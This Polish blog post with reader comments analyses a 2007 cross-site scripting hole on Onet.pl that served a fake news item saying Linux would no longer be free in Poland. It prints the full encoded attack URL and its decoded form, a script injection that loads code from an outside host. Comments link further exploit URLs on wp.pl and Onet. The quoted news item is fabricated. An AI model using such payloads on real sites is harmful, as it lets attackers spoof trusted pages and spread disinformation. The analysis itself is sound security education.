Cross site scripting i "Linuks już nie darmowy"

Gratuluje poczucia humoru. "Linuks już nie darmowy" - taki tytuł można zobaczyć w layoucie Onet.pl pod adresem, który krąży sobie po różnych komunikatorach, czatach i w inny sposób. Znaleziono kolejny sposób na sianie fermentu, tym razem z wykorzystaniem właściwości największego polskiego portalu. Fajnie. A przecież jest okres przed desygnowaniem na premiera i w tej sferze również wszyscy chętnie uwierzą we wszystko. Środowisko internetowe wciąż jest hermetyczne i dowcipy ma branżowe. Ale kiedyś wypłynie na szerokie wody ogólnospołeczne...

Wikipedia pisze: "Cross-site scripting (XSS) to sposób ataku na serwis WWW polegający na osadzeniu w treści atakowanej strony kodu (zazwyczaj JavaScript), który wyświetlony innym użytkownikom może doprowadzić do wykonania przez nich niepożądanych akcji. Skrypt umieszczony w zaatakowanej stronie może obejść niektóre mechanizmy kontroli dostępu do danych użytkownika". Oczywiście to nie wszystkie zastosowania tego mechanizmu.

Pod sfabrykowanym linkiem, który przekazywany jest różnymi kanałami (http://tnij.org/linux_juz_nie_darmowy), a który w istocie stanowi skrót do nieco dłuższego URL, można przeczytać bełkotliwie napisany tekst, który przywołam w całości (dla celów archiwalnych, bo może przyda się kiedyś edukacyjnie):

W ciągu najbliższych dni Polska stanie się jedynym krajem na świecie w którym użytkowanie systemu operacyjnego Linuks nie będzie darmowe.

Wszystko za sprawą nowej ustawy o ochronie praw autorskich, którą zamierza wprowadzić PiS przed przekazaniem rządów Platformie Obywatelskiej. W myśl ustawy każdy komputer podłączony do internetu musi zostać zarejestrowany w stworzonym na ten cel Krajowym Rejestrze Teleinformatycznym. Jak tłumaczy minister rejestr ten wielokrotnie zwiększy wykrywalność przestępstw internetowych - zwłaszcza nielegalnego ściągania filmów, oprogramowania oraz muzyki.

Rejestracja w systemie ma być darmowa jedynie dla nowo rejestrowanych systemów operacyjnych Windows. Dane użytkownika rejestrującego produkt Microsoftu będą automatycznie przekazywane do KRT. Właściciele komputerów z już zarejestrowanymi systemami oraz ci którzy używaja innych systemów operacyjnych jak min. Linuks czy Mac OS będą musieli wnieść jednorazową opłatę za każdy komputer z dostępem do internetu. Wstępnie cena rejestracji została oszacowana na 47zł.

A tak to wygląda po zrenderowaniu strony i osadzonego tam tekstu z zewnętrznego źródła:

fałszywa notatka dostępna pod adresem Onet.pl

Fałszywa notatka dostępna pod adresem "w domenie" onet.pl (por. poniżej)

Ciekawe ile osób się na to nabierało? Zobaczymy, czy w głównych serwisach powtórzy się sfabrykowana informacja. W każdym razie pokazuje to siłę jaką mogą wykorzystać manipulatorzy.

Tnij.org to serwis, który służy do "skracania" linków. Tak naprawdę serwis tworzy przekierowanie z krótkiego adresu na ten prawdziwy. W tym przypadku prawdziwy (ale w jako hex) adres to:

http://wiadomosci.onet.pl/1635435%27%29%
3b%7d%64%6f%63%75%6d%65%6e%74%2e%77%72%
69%74%65%28%27%3c%73%63%72%69%70%74%20%
73%72%63%3d%22%68%74%74%70%3a%27%2b%53%
74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%
72%43%6f%64%65%28%34%37%29%2b%53%74%72%
69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%
6f%64%65%28%34%37%29%2b%27%6f%6e%2e%68%
6f%6d%65%6c%69%6e%75%78%2e%6f%72%67%27%
2b%53%74%72%69%6e%67%2e%66%72%6f%6d%43%
68%61%72%43%6f%64%65%28%34%37%29%2b%27%
61%2e%6a%73%22%20%27%2b%53%74%72%69%6e%
67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%
65%28%34%37%29%2b%53%74%72%69%6e%67%2b%
27%3e%27%29%3b%66%75%6e%63%74%69%6f%6e%
20%78%28%29%7b%78%28%27,18,item.html

Ten kod (zaczynający się od pierwszego procenta), po konwersji HEX to ASCII, wygląda tak:

');}document.write('<script
src="http:'+String.fromCharCode(47)+String.fromCharCode
(47)+'on.homelinux.org'+String.fromCharCode(47)+
'a.js" '+String.fromCharCode(47)+String+'>');
function x(){x('

Pozdrawiam pomysłodawców i wykonawców. Następnym razem postarajcie się jednak napisać notatkę językiem bardziej wiarygodnym. W Polsce ustawy przyjmowane są przez Parlament. Rząd sam z siebie żadnej ustawy nie może przyjąć. Jeśli cytujecie ministra, to podajcie jego nazwisko i ministerstwo, którym kieruje, etc...

Opcje przeglądania komentarzy

Wybierz sposób przeglądania komentarzy oraz kliknij "Zachowaj ustawienia", by aktywować zmiany.

Fala poszła

VaGla's picture

Skoro odkryto właściwości onetowego serwisu, to fala dowcipów poszła w Sieć. I tak można już przeczytać np., że "Steve Ballmer podał się do dymisji". Pewnie jeszcze kilka takich rewelacji pojawi się w najbliższym czasie :)

screenshot fałszywej notatki pt. Steve Ballmer podał się do dymisji

--
[VaGla] Vigilant Android Generated for Logical Assassination

Wiesz tragiczne to nie są

Wiesz tragiczne to nie są takie głupie wygłupy bo może są medialne, ale nie czynią wiele zła.

Tragiczne jest to, że takie podatności ma WIELE innych serwisów, tylko z nich sobie nikt jaj nie robi, a bardziej wykorzystuje to w niecnych celach.

Ja przewiduję, że niedługo wrócimy do klasycznego HTML łupanego, bez żadnych JS, Javy, Flasha ze wszystkimi ich dziurami właśnie z tego powodu.

Ja się boję banków, które np. zmuszają do używania tych technologii. Bo ich nie rozumiem (są bardzo skomplikowane) ale wiem jaki niosą potencjał zagrożeń.

Czas najwyższy

Czas najwyższy żeby się z tą pogonią za nowymi technologiami trochę opamiętać, w momencie kiedy stare doskonale się sprawdzają.

Ja dzisiaj nie mogłem się zalogować na stronie banku, bo... miałem wyłączony JavaScript. Wszystko, co zobaczyłem, to "wpisz swój PIN tutaj" bez żadnego pola do wpisania.

Każdy, kto choć trochę wie o bezpieczeństwie może potwierdzić, że nieprzemyślane zwiększanie skomplikowania systemu nie prowadzi raczej do zwiększenia jego bezpieczeństwa (że już o kosztach utrzymania i łatwości użycia nie wspomnę), a wręcz przeciwnie.

bawie się nagrywarką desktopową

VaGla's picture

Niestety nagranie nie jest najlepszej jakości, bo trzeba jednak ustawić inne (mniejsze) wymiary nagrywanego obszaru. Po kompresji do flv niewiele widać, ale jeśli się zna treść powyższej notatki, to niech będzie sobie taka ilustracja:


A więc w YouTube umieściłem kolejny filmik, tym razem "edukacyjny" Cross site scripting i "Linuks już nie darmowy", chociaż mało edukacyjny, skoro niewyraźny... Następnym razem będzie lepiej. Mam nadzieję.
--
[VaGla] Vigilant Android Generated for Logical Assassination

Mały offtopic - jakość

Mały offtopic - jakość nie spadła z powodu kompresji do flv, tylko z powodu używania youtube ;) Polecam inne alternatywne serwisy video (np. viddler.com), w których można uploadować filmy nawet w jakości hd bez (az tak) stratnej kompresji.

I jeszcze cenzura

VaGla's picture

Tu też jest ten motyw "ustawy": "Od 1 stycznia 2008 Polska stanie się drugim po Chinach krajem na świecie z pełną cenzurą Internetu. Za pełen dostęp trzeba będzie słono zapłacić". Ciekawe, że stan zagrożenia siany jest motywem normatywnym, związanym z internetem... Być może ludzie są skłonni uwierzyć w tego typu doniesienia z powodu określonego stanu polskiej dyskusji na temat prawa i nowych technologii? Gdyby ktoś miał wątpliwości - nie mam z tym nic wspólnego:

fałszywa notatka: Internet na cenzurowanym
--
[VaGla] Vigilant Android Generated for Logical Assassination

No i po ptokach

No i onetowcy załatali dziurę. Jak chcą to potrafią. Szkoda tylko, że można było siać zamęt przez ładnych kilkanaście godzin. Teraz może czas na WP ? ;-)

Właśnie zrobiłem to samo

Właśnie zrobiłem to samo na wp.pl :-)
http://tnij.org/linux_juz_nie_darmowy2

kolega jest odważny

kolega jest odważny

Biorąc pod uwagę takie sprawy jak:

Sprawa Precious

Włamanie poprzez wpisanie ' or 1=1

A po otworzeniu widać, że plik js .znajduje się na koncie uczelnianym niejakiego marynicza...

Jak wynika z doświadczenia, po wykryciu luki w zabezpieczeniach najlepiej... pożałować, że się za to zabrało.Nawet, jak żadnych zabezpieczeń nie było...

Wysłałem im informację o

Wysłałem im informację o tej dziurze... I nie wiedziałem że za samo poinformowanie w Polsce można iść do więzienia. Zresztą planowałem posłać im maila...

No i już naprawili... Ale

No i już naprawili... Ale nie podziękowali ...

Wirtualna Polska

VaGla's picture

I rzeczywiście. Poniżej screenshot fałszywej notatki opublikowanej z wykorzystaniem infrastruktury Wirtualnej Polski. Tu da się kod wkleić za "...wiadomosc.html?kat=5630..."

fałszywa notatka opublikowana z wykorzystaniem infrastruktury  Wirtualnej Polski
--
[VaGla] Vigilant Android Generated for Logical Assassination

Na całej akcji najbardziej

Na całej akcji najbardziej straciło tak na prawdę PiS. Parę serwisów linkowało już ten tekst i na forach "wrzawa" - krótka, ale była.

Z pewnością nie do każdego dotarło że to żart, a PiS traci wyborców przez "swój kolejny głupi pomysł".

Parę pytań... Skąd

Parę pytań... Skąd pochodzą komentarze pod fałszywką? Czy tylko komentarz w stylu "to jest fake" jest dostawiony do fałszywki, a reszta to losowo dobrane opinie z innych newsów? A jeżeli nie, to skąd zwykły czytelnik WP (czy Onetu), nie mający nic wspólnego z Vagla.pl trafia na fałszywkę? Czy fałszywy news jest olinkowany gdzieś na stronie głównej portalu?

No i jak się mają zabezpieczenia bazy danych w portalach do zabezpieczeń ich serwerów? Zawsze myślałem, że nawet niedoskonała baza danych jednak nie będzie złamana, jeżeli serwer będzie jako całość chroniony systemowo. Chyba, że Piotr (cytując Wikipedię) nie dość dokładnie opisał mechanizm cross site scriptingu. Czy wywołanie takiego efektu wymaga ingerencji w serwer portalu, czy też wystarczy skrypt wiszący na dowolnym obcym (np. naszym) serwerze czy nawet lokalnym kompie i tylko doklejamy skrypt do oryginalnej części URL? No ale skąd wtedy dostęp do newsa dla zwykłych czytelników? Czyżby tylko przez obce fora z krótkimi linkami?

Prosze przeczytać tekst

VaGla's picture

W tekście jest wyjaśnione, w jaki sposób skracane linki krążyły po Sieci, jest też opisany mechanizm "wklejania" treści umieszczonych na innych serwerach (za pomocą JavaScript'u). Adres kierował do zasobu portalu (jakiegoś artykułu) i potem zaszyty tam skrypt podmieniał treść tego artykułu na to, co pochodziło ze zdalengo serwera). Komentarze widoczne pod fałszywym tekstem przypisane są do pierwotnego artykułu (czyli tego, który jest podmieniany JavaScriptem na fałszywy).
--
[VaGla] Vigilant Android Generated for Logical Assassination

onet wciąż jest dziurawy

Wygląda na to, że w onecie na szybko załatali dziurę tylko w jednym miejscu. W innych częściach serwisu (biznes.onet.pl) nadal są błędy. Przykład z dodatkowo sfałszowanym pierwszym komentarzem:
http://tnij.org/onet_wciaz_dziurawy

I screenshot na wypadek, gdyby naprawili:

Pozdrawiam,

Dalej dziurawe

Już jest 13.11.2007 i dalej nie poprawili :)

I dalej cisza w kwestji

I dalej cisza w kwestji luki, 24 lis 2007 :P

Piotr VaGla Waglowski

VaGla
Piotr VaGla Waglowski - prawnik, publicysta i webmaster, autor serwisu VaGla.pl Prawo i Internet. Członek Rady ds Cyfryzacji przy Ministrze Cyfryzacji, ekspert w Departamencie Oceny Ryzyka Regulacyjnego Ministerstwa Rozwoju, felietonista miesięcznika "IT w Administracji" (wcześniej również felietonista miesięcznika "Gazeta Bankowa" i tygodnika "Wprost"). Uczestniczył w pracach Obywatelskiego Forum Legislacji, działającego przy Fundacji im. Stefana Batorego w ramach programu Odpowiedzialne Państwo. W 1995 założył pierwszą w internecie listę dyskusyjną na temat prawa w języku polskim, Członek Założyciel Internet Society Poland, pełnił funkcję Członka Zarządu ISOC Polska i Członka Rady Polskiej Izby Informatyki i Telekomunikacji. Był również Członkiem Rady Informatyzacji przy MSWiA, członkiem Zespołu ds. otwartych danych i zasobów przy Komitecie Rady Ministrów do spraw Cyfryzacji oraz Doradcą społecznym Prezesa Urzędu Komunikacji Elektronicznej ds. funkcjonowania rynku mediów w szczególności w zakresie neutralności sieci. W latach 2009-2014 Zastępca Przewodniczącego Rady Fundacji Nowoczesna Polska, w tym czasie był również Członkiem Rady Programowej Fundacji Panoptykon. Więcej >>